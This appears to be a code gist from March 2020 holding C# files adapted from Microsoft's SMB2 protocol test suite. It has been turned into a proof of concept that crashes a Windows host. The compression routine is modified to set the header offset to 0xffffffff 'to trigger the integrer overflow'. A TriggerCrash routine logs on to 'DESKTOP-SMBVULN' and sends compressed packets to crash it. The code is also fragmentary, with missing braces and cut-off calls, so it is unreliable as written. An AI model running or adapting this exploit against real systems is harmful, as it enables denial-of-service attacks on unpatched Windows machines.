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Created March 13, 2020 03:20
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// .\WindowsProtocolTestSuites\ProtoSDK\MS-SMB2\Common\Smb2Compression.cs
namespace Microsoft.Protocols.TestTools.StackSdk.FileAccessService.Smb2.Common
/// <summary>
/// SMB2 Compression Utility.
/// </summary>
public static class Smb2Compression
private static uint i = 0;
/// <summary>
/// Compress SMB2 packet.
/// </summary>
/// <param name="packet">The SMB2 packet.</param>
/// <param name="compressionInfo">Compression info.</param>
/// <param name="role">SMB2 role.</param>
/// <param name="offset">The offset where compression start, default zero.</param>
/// <returns></returns>
public static Smb2Packet Compress(Smb2CompressiblePacket packet, Smb2CompressionInfo compressionInfo, Smb2Role role, uint offset = 0)
var compressionAlgorithm = GetCompressionAlgorithm(packet, compressionInfo, role);
/*if (compressionAlgorithm == CompressionAlgorithm.NONE)
return packet;
// HACK: shitty counter to force Smb2Compression to not compress the first three packets (NEGOTIATE + SSPI login)
if (i < 3)
return packet;
var packetBytes = packet.ToBytes();
var compressor = GetCompressor(compressionAlgorithm);
// HACK: Insane length to trigger the integrer overflow
offset = 0xffffffff;
var compressedPacket = new Smb2CompressedPacket();
compressedPacket.Header.ProtocolId = Smb2Consts.ProtocolIdInCompressionTransformHeader;
compressedPacket.Header.OriginalCompressedSegmentSize = (uint)packetBytes.Length;
compressedPacket.Header.CompressionAlgorithm = compressionAlgorithm;
compressedPacket.Header.Reserved = 0;
compressedPacket.Header.Offset = offset;
compressedPacket.UncompressedData = packetBytes.Take((int)offset).ToArray();
compressedPacket.CompressedData = compressor.Compress(packetBytes.Skip((int)offset).ToArray());
var compressedPackectBytes = compressedPacket.ToBytes();
// HACK: force compressed packet to be sent
return compressedPacket;
// Check whether compression shrinks the on-wire packet size
// if (compressedPackectBytes.Length < packetBytes.Length)
// {
// compressedPacket.OriginalPacket = packet;
// return compressedPacket;
// }
// else
// {
// return packet;
// }
namespace Microsoft.Protocols.TestManager.BranchCachePlugin
class Program
static void TriggerCrash(BranchCacheDetector bcd, DetectionInfo info)
Smb2Client client = new Smb2Client(new TimeSpan(0, 0, defaultTimeoutInSeconds));
client.CompressionInfo.CompressionIds = new CompressionAlgorithm[] { CompressionAlgorithm.LZ77 };
// NEGOTIATION is done in "plaintext", this is the call within UserLogon:
// client.Negotiate(
// 0,
// 1,
// Packet_Header_Flags_Values.NONE,
// messageId++,
// new DialectRevision[] { DialectRevision.Smb311 },
// Capabilities_Values.NONE,
// clientGuid,
// out selectedDialect,
// out gssToken,
// out header,
// out negotiateResp,
// preauthHashAlgs: new PreauthIntegrityHashID[] { PreauthIntegrityHashID.SHA_512 }, // apprently mandatory for compression
// compressionAlgorithms: new CompressionAlgorithm[] { CompressionAlgorithm.LZ77 }
// );
if (!bcd.UserLogon(info, client, out messageId, out sessionId, out clientGuid, out negotiateResp))
// From now on, we compress every new packet
client.CompressionInfo.CompressAllPackets = true;
// Get tree information about a remote share (which does not exists)
TREE_CONNECT_Response treeConnectResp;
string uncSharePath = Smb2Utility.GetUncPath(info.ContentServerName, defaultShare);
// trigger crash here
out treeId,
out header,
out treeConnectResp
static void Main(string[] args)
Console.WriteLine("Hello World!");
Logger logger = new Logger();
AccountCredential accountCredential = new AccountCredential("", "Ghost", "Ghost");
BranchCacheDetector bcd = new BranchCacheDetector(
DetectionInfo info = new DetectionInfo();
info.SelectedTransport = "SMB2";
info.ContentServerName = "DESKTOP-SMBVULN";
info.UserName = "Ghost";
info.Password = "Ghost";
Console.WriteLine("Goodbye World!");
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